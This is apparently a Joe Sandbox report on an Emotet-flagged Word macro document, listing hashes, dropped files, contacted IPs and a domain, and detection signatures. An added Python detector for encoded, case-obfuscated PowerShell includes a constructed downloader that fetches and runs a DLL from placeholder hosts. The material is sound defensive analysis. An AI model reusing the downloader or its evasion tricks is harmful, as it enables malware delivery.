Joe Sandbox version: 31.0.0 Red Diamond
IR
Analysis ID: 337532
Product: CloudBasic
Start time: 18:10:14
Start date: 08/01/2021
Sample name: Doc.doc
Cookbook: defaultwindowsofficecookbook.jbs
Analysis system: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Platform: WINDOWS
MD5: 16f391d60eff19aabb43225c85d5145c
SHA1: 58becf84bea5dafb9d46afc194a4eaf946fa4c72
SHA256: af5c3952d0c7a7a2925c6086aa050dd076afc1adead3663dc2141087009a6d87
File type (TrID): Microsoft Word document (32009/1) 54.23%
Further header values (labels not preserved in extraction): true, false, false, false, 100, 0, 100, 5, 0, 5, false
Dropped files (path, flag as recorded, MD5, SHA1, SHA256):

Path:   C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{99DD3073-AAC4-4BB8-A12E-BAAB271DD5EB}.tmp
Flag:   false
MD5:    CF70770B18EE4D2D3584E26882E961A9
SHA1:   B674900882E193830D40625F6FB3968665CF88F5
SHA256: 11491FBEEBBF8D1C6B421C310B38DA090923E2B20CF966E70AE7AE8B906C5833

Path:   C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D1AA7D61-551E-40AF-9919-E039C2A6E74E}.tmp
Flag:   false
MD5:    5D4D94EE7E06BBB0AF9584119797B23A
SHA1:   DBB111419C704F116EFA8E72471DD83E86E49677
SHA256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1

Path:   C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
Flag:   false
MD5:    CEF28C6E4F49BB0DE2976E073BAB441E
SHA1:   CA58C8432E040057B717AC133A9265853586BA0D
SHA256: 1D4FA10D7A83016498AB2358804248BAF6817D661558040F362B1A354004C40D

Path:   C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Doc.LNK
Flag:   false
MD5:    C38445A30D6C8B15D19CCC6F96CED1AB
SHA1:   5FC35945C876F1605C2864C6BF6090D75A5DD137
SHA256: 9C927546DD20294D9904134808A510BF562DB8FA4C29BE2C80DDE3875DEC98C5

Path:   C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Flag:   false
MD5:    071D4A911934095DE3D17DDC9112A372
SHA1:   5765B8D82EE7042EA3223FE74B8F7B8CE92977B0
SHA256: 3F7D6A8692933570421B2ABAA5D00299928FFAEB27FBD44CA64901D4DD018E2F

Path:   C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Flag:   false
MD5:    39EB3053A717C25AF84D576F6B2EBDD2
SHA1:   F6157079187E865C1BAADCC2014EF58440D449CA
SHA256: CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A

Path:   C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CNLDNGQDOXTNQW5LTFBN.temp
Flag:   false
MD5:    2F954C783E9CD474F876CD96D4950B3C
SHA1:   5E872158635EA3B407AEEE7CCD1701B20DBD7DC2
SHA256: 63B0E7657CA6D348F80B4A75B33EAC54614B21FD92B963AB169297C0D39BDA4E

Path:   C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll
Flag:   true
MD5:    0BCAFFBDA4138F2EE2786CFD098C1DA9
SHA1:   3D6E52F126809C05E69F1D543B7F8D53435A8E17
SHA256: 5E9F4504B7E0938A2B2EB9A7F090BE9F4B1101AA3BE145A3B5895CB14BACD0EF

Path:   C:\Users\user\Desktop\~$Doc.doc
Flag:   true
MD5:    39EB3053A717C25AF84D576F6B2EBDD2
SHA1:   F6157079187E865C1BAADCC2014EF58440D449CA
SHA256: CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A

Note on the hashes: ~$Doc.doc and ~$Normal.dotm have identical digests because both are Word owner lock files that contain only the logged-in user name; they are a side effect of opening the document, not a payload. Yvtlx6p4.dll under the random-looking C:\Users\user\Bqpeen6\Bbs5w_e\ directory is the only PE among the dropped files and is the artifact to pivot on for the "Powershell drops PE file" and "dropped file" detection signatures below.
Contacted IPs:
167.71.148.58
216.218.207.98
202.187.222.40
184.66.18.83

Domain: paulscomputing.com -> 216.218.207.98 (flag as recorded: true)
Signatures:
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
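Several of the PowerShell signatures above (process created via WMI, encoded command line option, case anomaly, very long command line, dropper URLs recovered from the decoded script) can be reproduced from a single process-creation event. The following is an added example, not Joe Sandbox's own detection logic and not taken from this report: it runs those heuristics over two constructed Sysmon-style events. The length threshold, the canonical flag list and the sample command lines (including the example.invalid and 203.0.113.7 URLs) are assumptions made for the example.

```python
"""Heuristics behind the PowerShell-related signatures in the report, run over
constructed Sysmon-style process-creation events. Added example; thresholds
and sample data are assumptions, not values from the sandbox."""
import base64
import re

# powershell.exe accepts any unambiguous prefix of a parameter name, so
# -e, -ec, -en, -enc ... -EncodedCommand all select the same option.
CANONICAL_FLAGS = ("EncodedCommand", "NoProfile", "NonInteractive", "NoLogo",
                   "NoExit", "WindowStyle", "ExecutionPolicy", "Command", "File")
ENCODED_PREFIXES = {"EncodedCommand"[:n].lower() for n in range(1, 15)} | {"ec"}
LONG_CMDLINE_THRESHOLD = 1000      # assumed; the sandbox's own value is not on the page
WMI_HOST = "wmiprvse.exe"          # Win32_Process.Create children are spawned from here
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)


def case_anomaly(token: str, canonical: str) -> bool:
    """True if token spells a prefix of canonical with mixed casing that is neither
    the canonical spelling, lower, UPPER nor Capitalized (e.g. pOwErShElL)."""
    letters = token.lstrip("-/")
    expected = canonical[:len(letters)]
    if not letters or letters.lower() != expected.lower():
        return False               # a different word entirely; not our concern here
    return letters not in (expected, expected.lower(), expected.upper(), expected.capitalize())


def find_encoded_payload(tokens):
    """Return (flag_token, base64_payload) for the first -EncodedCommand-style
    argument, or (None, None) when there is none."""
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] == "-" and tok[1:].lower() in ENCODED_PREFIXES:
            return tok, tokens[i + 1].strip("'\"")
    return None, None


def decode_encoded_command(payload: str):
    """-EncodedCommand carries the script as base64 over UTF-16LE."""
    try:
        return base64.b64decode(payload, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_event(event: dict) -> dict:
    """Return the signatures that fire for one process-creation event, plus the
    decoded script and any URLs it references (empty for non-PowerShell images)."""
    def basename(path):
        return path.strip('"').rsplit("\\", 1)[-1]

    cmdline = event["CommandLine"]
    tokens = cmdline.split()
    result = {"signatures": [], "script": None, "urls": []}
    if basename(event["Image"]).lower() not in ("powershell.exe", "pwsh.exe"):
        return result
    sigs = set()
    if basename(event["ParentImage"]).lower() == WMI_HOST:
        sigs.add("Creates processes via WMI")
    if len(cmdline) > LONG_CMDLINE_THRESHOLD:
        sigs.add("Very long command line found")
    if case_anomaly(basename(tokens[0]), "PowerShell.exe"):
        sigs.add("PowerShell case anomaly found")
    for tok in tokens[1:]:
        if tok[:1] == "-" and any(case_anomaly(tok, c) for c in CANONICAL_FLAGS):
            sigs.add("PowerShell case anomaly found")
    flag, payload = find_encoded_payload(tokens)
    if flag:
        sigs.add("Encrypted powershell cmdline option found")
        result["script"] = decode_encoded_command(payload)
        if result["script"]:
            result["urls"] = URL_RE.findall(result["script"])
            if result["urls"]:
                sigs.add("Potential dropper URLs found in powershell memory")
    result["signatures"] = sorted(sigs)
    return result


# Constructed sample events (not from the report): a routine script launch and a
# macro-style launch via WMI carrying an encoded downloader with placeholder URLs.
SAMPLE_SCRIPT = (
    "$ErrorActionPreference='SilentlyContinue';"
    "$wc=New-Object System.Net.WebClient;"
    "$wc.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; "
    "Trident/7.0; rv:11.0) like Gecko');"
    "$urls='http://example.invalid/wp-content/a.php','http://203.0.113.7/img/b.php';"
    "$dst=$env:TEMP+'\\'+[guid]::NewGuid().ToString()+'.dll';"
    "foreach($u in $urls){try{$wc.DownloadFile($u,$dst);"
    "if((Get-Item $dst).Length -gt 20000){"
    "Start-Process rundll32.exe -ArgumentList ($dst+',Control_RunDLL');break}}catch{}}"
)
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "pOwErShElL.exe -nOp -w hIdDeN -eNc " + SAMPLE_B64},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        hit = analyse_event(ev)
        print(ev["CommandLine"][:40], hit["signatures"], hit["urls"])
```

The parent-image check is what turns a Word macro into a WMI finding: Win32_Process.Create makes WmiPrvSE.exe, not WINWORD.EXE, the parent of the PowerShell process, which also breaks naive "Office spawned a shell" rules. Decoding the UTF-16LE payload before URL extraction is what recovers the dropper URLs that the raw command line never exposes.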